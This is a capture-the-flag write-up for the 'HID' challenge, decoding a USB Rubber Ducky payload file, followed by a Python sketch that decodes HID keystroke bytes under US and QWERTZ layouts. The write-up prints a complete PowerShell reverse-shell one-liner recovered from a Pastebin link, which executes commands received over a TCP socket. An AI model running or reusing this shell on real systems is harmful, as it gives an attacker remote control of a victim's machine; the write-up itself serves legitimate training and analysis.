Tags: analysis binary
#### Original Writeup - [https://github.com/CTSecUK/Syskron-Security-CTF-2020/blob/main/Write-ups/HID.md](https://github.com/CTSecUK/Syskron-Security-CTF-2020/blob/main/Write-ups/HID.md)
-----
# HID
 

## Details
***One of my colleagues found a USB stick in the parking lot in front of our company. Fortunately he handed it over directly to us. The drive contains an SD card with just one file. Maybe it's no normal USB flash drive?***
Firstly I started by going to "ducktoolkit.com" 
I chose the **Decode Payload** option 
I uploaded the file from my downloads folder [inject.bin] and then clicked **Decode** 
Once it had uploaded and the page refreshed, I chose the option to Download [duckycode.txt] 
I opened up the [duckycode.txt] in Pluma, scrolled through the code and found a download string to a Pastebin which looked suspicious.

I changed the incorrect character to look like a normal URL - https://pastebin.com/raw/YRD8jsvd and went to the website to see what was there.
I received a 404 error.
I went back over the code and noticed more spelling mistakes or letters that were in the wrong place, like the below:
**Copz and yip** stood out to me so I modified the URL, swapping Y to Z and tried that URL in the address bar - https://pastebin.com/raw/ZRD8jsvd
```
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10syskronCTF{y0u_f0und_m3}",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
The flag was hidden in the hostname/IP-address field.
Flag: ***syskronCTF{y0u_f0und_m3}***
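
The Y/Z swap seen in the decoded script is what happens when keystrokes encoded for a QWERTZ layout are decoded with a US table. The sketch below is an added example, not part of the original writeup or of the Duck Toolkit: it assumes the common two-byte `inject.bin` record (HID usage ID, then modifier byte, with a `0x00` usage ID marking a delay), covers only letters, digits, space and Enter, and runs on a constructed sample rather than the challenge file.

```python
# HID usage IDs name key positions, not characters, so the layout picks the letter.
SHIFT = 0x02 | 0x20  # left/right shift bits in the modifier byte


def layout(swap_yz=False):
    keys = {0x04 + i: c for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
    keys.update({0x1E + i: c for i, c in enumerate("1234567890")})
    keys.update({0x28: "\n", 0x2C: " "})
    if swap_yz:  # QWERTZ: the Y and Z positions are exchanged
        keys[0x1C], keys[0x1D] = "z", "y"
    return keys


US, QWERTZ = layout(), layout(swap_yz=True)


def decode(payload, keys):
    out = []
    for i in range(0, len(payload) - 1, 2):
        code, mod = payload[i], payload[i + 1]
        if code == 0x00:  # assumed delay record: second byte is the wait
            continue
        ch = keys.get(code)
        if ch is None:
            out.append(f"<0x{code:02x}>")  # key outside this small table
        elif mod & SHIFT:
            out.append(ch.upper() if ch.isalpha() else f"<shift+{ch}>")
        else:
            out.append(ch)
    return "".join(out)


def encode(text, keys):
    """Build a constructed sample; not part of the analysis itself."""
    rev = {c: k for k, c in keys.items()}
    buf = bytearray()
    for ch in text:
        buf += bytes([rev[ch.lower()], 0x02 if ch.isupper() else 0x00])
    return bytes(buf)


# Constructed sample: a delay record, then text typed for a QWERTZ host.
SAMPLE = b"\x00\xff" + encode("Copy and zip ZRD8jsvd", QWERTZ)

if __name__ == "__main__":
    print("US layout:    ", decode(SAMPLE, US))
    print("QWERTZ layout:", decode(SAMPLE, QWERTZ))
```

Decoding a captured payload with more than one layout table and comparing the results is a quick way to spot which host layout the device was prepared for before trusting any URL or command in the output.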